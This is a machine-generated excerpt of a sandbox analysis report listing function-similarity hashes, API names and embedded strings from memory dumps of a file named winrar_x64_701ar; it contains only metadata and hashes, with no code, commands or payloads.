                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                            • Instruction ID: 24d6475dbd0fb55a54396731853e9bae4fc49cb3574ab8f65d498a098d704247
                                                            • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                            • Instruction Fuzzy Hash: 7C51A376A1865186E7349F29E041A3837A1EB66F59F244131CECDB7794CF3AE853C780
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                            • Instruction ID: 8e23d896bd3dba5133a8b73e916617aaf9649f8d8f2d76821af52afa9e0c9978
                                                            • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                            • Instruction Fuzzy Hash: E451B936A18A5181E7349F29E05263937A0EB66B59F244131DECCBB794CF3AEC53C780
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f9f3cd2992c65023a5ea7fc19f0cefddf71d6570bb4a6a01ba758df2379e2081
                                                            • Instruction ID: d9da79dd38dddca8e2dfe47245d95d34d1049a5f871c0dca9eebfbf469a2b896
                                                            • Opcode Fuzzy Hash: f9f3cd2992c65023a5ea7fc19f0cefddf71d6570bb4a6a01ba758df2379e2081
                                                            • Instruction Fuzzy Hash: BF518E37B286908BD764CF25E401A9E73A5F388798F045125EE8A93B09CF3DE945CF40
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6811fcd408ba071b51ec3c3de7f24f7e70c53c52c855f7db162867a8702698ae
                                                            • Instruction ID: 36797051847d251dc6cd466f70839f4b5dc06ab8ba134f36b07113463b6c85f4
                                                            • Opcode Fuzzy Hash: 6811fcd408ba071b51ec3c3de7f24f7e70c53c52c855f7db162867a8702698ae
                                                            • Instruction Fuzzy Hash: 70514473B184514BE7288F28D816BFD77A1F7A1B4AF444131DAC987688DE3DD941CB10
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                            • String ID:
                                                            • API String ID: 588628887-0
                                                            • Opcode ID: 321a00be8216ab1d5a6abf96824688860184d35458da0e7affeca5d9c463e6b8
                                                            • Instruction ID: e338fac85a9d8c6540e628fee73bb275c6fda0bdc569ccea082774b02056a389
                                                            • Opcode Fuzzy Hash: 321a00be8216ab1d5a6abf96824688860184d35458da0e7affeca5d9c463e6b8
                                                            • Instruction Fuzzy Hash: 30412322714A5582EF14CF2AE9169A973A1BB59FD1B099037EECDE7B58DF3CC0468340
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8cdc14705774243d19fb94633146f393bab702cd26d035aadc90ecda4019bf39
                                                            • Instruction ID: abf9be2e19bcef5a7b919ec35dd1d34a9e0172154c1086c79c64397b4a554be8
                                                            • Opcode Fuzzy Hash: 8cdc14705774243d19fb94633146f393bab702cd26d035aadc90ecda4019bf39
                                                            • Instruction Fuzzy Hash: C93109A2A08D424BE719DE16E9926BE7791F756385F008039DFCAD7B41CE3CE041C710
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e43b1bc40d61511b3b7f06c5c35b64dd774a12cb547e535d3d7b0db56cddfc01
                                                            • Instruction ID: 06e183b032749d6b28c27dedda6dcc2a1b1ffb3851599c375907def81ed92117
                                                            • Opcode Fuzzy Hash: e43b1bc40d61511b3b7f06c5c35b64dd774a12cb547e535d3d7b0db56cddfc01
                                                            • Instruction Fuzzy Hash: 64F062B1B286958ADFE5CF2DA883A6977D0E718381F908179D6CDD3B14DA3CD0608F48
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b26cc2c670222ae876159ff5603c0af37539fb50017e4d91ac7b3a384edc0ce7
                                                            • Instruction ID: 4cd74ea16f49255ea9c97ac113279f7a12b64724dbc0a6169405bce04a3a7bc8
                                                            • Opcode Fuzzy Hash: b26cc2c670222ae876159ff5603c0af37539fb50017e4d91ac7b3a384edc0ce7
                                                            • Instruction Fuzzy Hash: 7CA00121948802E8E6448F14A8928706330BB62316B900031E4CDA54A49E3CA605C214
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                            • String ID: <pi-ms-win-core-synch-l1-2-0.dll$SleepConditionVariableCS$WakeAllConditionVariable$kernel32.dll
                                                            • API String ID: 2565136772-369236946
                                                            • Opcode ID: e0361d743c454d09e960a600f16381c646ca90098b4fa54283586941770b61f3
                                                            • Instruction ID: 4bc434e10e94eb86c675621c430c3b3555ed4116df18f439027b34cd3c657c94
                                                            • Opcode Fuzzy Hash: e0361d743c454d09e960a600f16381c646ca90098b4fa54283586941770b61f3
                                                            • Instruction Fuzzy Hash: 0F211920E1AA0796FE549F15F89797477A0AF76B46F880074C9CEE66A8EE3CA4458700
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                                            • String ID:
                                                            • API String ID: 4119318379-0
                                                            • Opcode ID: 3a491d4ebbf2339c45bbe37badbdbcf07a2e33b8dd11d847ba04a74795a07cc1
                                                            • Instruction ID: e3974a658168e113b9ab0e64e57bbc5abd153f5467e66076cc4e1550eeeae55c
                                                            • Opcode Fuzzy Hash: 3a491d4ebbf2339c45bbe37badbdbcf07a2e33b8dd11d847ba04a74795a07cc1
                                                            • Instruction Fuzzy Hash: 6E41C229F1464286F3109F65D812FAD3760AB5EB9AF441130DDDE67B95CE3EE449CB00
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: f$f$p$p$f
                                                            • API String ID: 3215553584-1325933183
                                                            • Opcode ID: 3e37737b2b1630447d2a3105bac6e122366a1c5d0912d830ab69edb90e93f5d3
                                                            • Instruction ID: 08779c234daf71f3429f92e103a0fc90dabac96e3933e6e2f6ec6a83b0be7b27
                                                            • Opcode Fuzzy Hash: 3e37737b2b1630447d2a3105bac6e122366a1c5d0912d830ab69edb90e93f5d3
                                                            • Instruction Fuzzy Hash: 19129371E0C24386FB30BE15B056AB976A1FBA2756F844135E6DDE66C4CF3CE9808B50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 849930591-393685449
                                                            • Opcode ID: bf35c164f4fc320906250694f78045419fc462ffd86672fcd34a9d4721b1bdcc
                                                            • Instruction ID: 1c92d402c5c2855a26d82302ce78a1add344a9b9548648636c62fa2959844a77
                                                            • Opcode Fuzzy Hash: bf35c164f4fc320906250694f78045419fc462ffd86672fcd34a9d4721b1bdcc
                                                            • Instruction Fuzzy Hash: 29E18172A087418AEB649F65D482AAD77A0FB6679DF000139EECDAB755CF3CE480C740
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: NamePath$FileLongMoveShort
                                                            • String ID: rtmp
                                                            • API String ID: 3741477874-870060881
                                                            • Opcode ID: 864bdc96c11d505100e4f4ee2dd4cf0369ce68428be1a13680a116c38f3d6fe5
                                                            • Instruction ID: 64430e9687d6b2d3569597167ee8e7af87d5f1b86aea7b5e313f90ebc7738d5f
                                                            • Opcode Fuzzy Hash: 864bdc96c11d505100e4f4ee2dd4cf0369ce68428be1a13680a116c38f3d6fe5
                                                            • Instruction Fuzzy Hash: EEA12012E09A0255FA10EF61D4539FD6770AFF2795F404031E9CDEB6AAEE2CD94AC740
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow$CloseCodeExitHandleProcess
                                                            • String ID: .exe$.inf$Install
                                                            • API String ID: 235082525-1844831949
                                                            • Opcode ID: d8861afc4b9a202871ea97dc2f72c2079ecfc2f1bea4ddbe517bf783db686e3a
                                                            • Instruction ID: 8a90872450e9f4e7f935261b4d4f1b94da0da5295e2c4728d9858a49ff821474
                                                            • Opcode Fuzzy Hash: d8861afc4b9a202871ea97dc2f72c2079ecfc2f1bea4ddbe517bf783db686e3a
                                                            • Instruction Fuzzy Hash: C9A18C11F0DB0645FB14EF619893ABD27B1AFB7786F405031D9CEEB696DE2CE9058240
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LICENSEDLG
                                                            • API String ID: 0-2177901306
                                                            • Opcode ID: 0c808f6cd05cc0a747108c0f82ff5e28cc2279d91e0e18d1e2e229003918714d
                                                            • Instruction ID: 38549d06a7ae779c0409a884325250160ae6b923e3d88f3210fa92debbdd2516
                                                            • Opcode Fuzzy Hash: 0c808f6cd05cc0a747108c0f82ff5e28cc2279d91e0e18d1e2e229003918714d
                                                            • Instruction Fuzzy Hash: A031B528F0C74282FA549F15A992E782350AFABFD6F041031DDCEEBB95CE2DE5468701
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Time$System$File$Format$DateLocalSpecific
                                                            • String ID: 2
                                                            • API String ID: 909090443-450215437
                                                            • Opcode ID: 4b14c85589888b76fbd4abfff1d50f03c115230c74de0e2e2410d8fb73203b99
                                                            • Instruction ID: 1501ae940a23b0e51583b13db66113d9fb975dd73e8b505a28d97109211b9f2f
                                                            • Opcode Fuzzy Hash: 4b14c85589888b76fbd4abfff1d50f03c115230c74de0e2e2410d8fb73203b99
                                                            • Instruction Fuzzy Hash: 24318232A18B8696EB10DF60E841ADE73B1FBA9749F415132DACD97A58DF3CD109CB40
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000000,SELECT * FROM Win32_OperatingSystem,?,00007FF6C3BA2E15,?,?,?,00007FF6C3BA2E4E), ref: 00007FF6C3BB9047
                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000000,SELECT * FROM Win32_OperatingSystem,?,00007FF6C3BA2E15,?,?,?,00007FF6C3BA2E4E), ref: 00007FF6C3BB90C9
                                                            • SysAllocString.OLEAUT32 ref: 00007FF6C3BB90D6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocString
                                                            • String ID: SELECT * FROM Win32_OperatingSystem
                                                            • API String ID: 262959230-522155302
                                                            • Opcode ID: 5f571fdd453f642f9c47b9ffaa28006f8207e9096ed2591ccb07c40ec42f64f1
                                                            • Instruction ID: cd2b0b204710ef09b719ef062ccc0c4824e0ab99dddfc67ab43852cd5a5a235b
                                                            • Opcode Fuzzy Hash: 5f571fdd453f642f9c47b9ffaa28006f8207e9096ed2591ccb07c40ec42f64f1
                                                            • Instruction Fuzzy Hash: 2F411731B0878685EB149F359482B787290EF66BAAF144634EAEDEB7D9CF3CD0418700
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ButtonCheckedWindow$ClassName
                                                            • String ID: STATIC
                                                            • API String ID: 2214364856-1882779555
                                                            • Opcode ID: 61700d33a8561694a78568dba75358c344a7c7a9c021a197164aa6a8e619da87
                                                            • Instruction ID: e99867ca02bff762f0b6416b122e9098309617a142c24318bc05b5be5f1bb580
                                                            • Opcode Fuzzy Hash: 61700d33a8561694a78568dba75358c344a7c7a9c021a197164aa6a8e619da87
                                                            • Instruction Fuzzy Hash: E4310829B0CA4286EA249F15A492FB92351BFABBC6F001030CDCDAF755CE3DE4468B40
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Value$ErrorLast
                                                            • String ID:
                                                            • API String ID: 2506987500-0
                                                            • Opcode ID: 33f8256a778b83c36d7b81987b11f071b38dbe2f901bfaba2eaf53f1a568370b
                                                            • Instruction ID: 0eb24fb91e49bccae308b321ba441fab9b6a6910369f422a18ad4f5ec187fc8f
                                                            • Opcode Fuzzy Hash: 33f8256a778b83c36d7b81987b11f071b38dbe2f901bfaba2eaf53f1a568370b
                                                            • Instruction Fuzzy Hash: 9521BE20B0C24246FA34BF25764393D52525FA67B2F140675E9FEE66C6DE2CE5028240
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
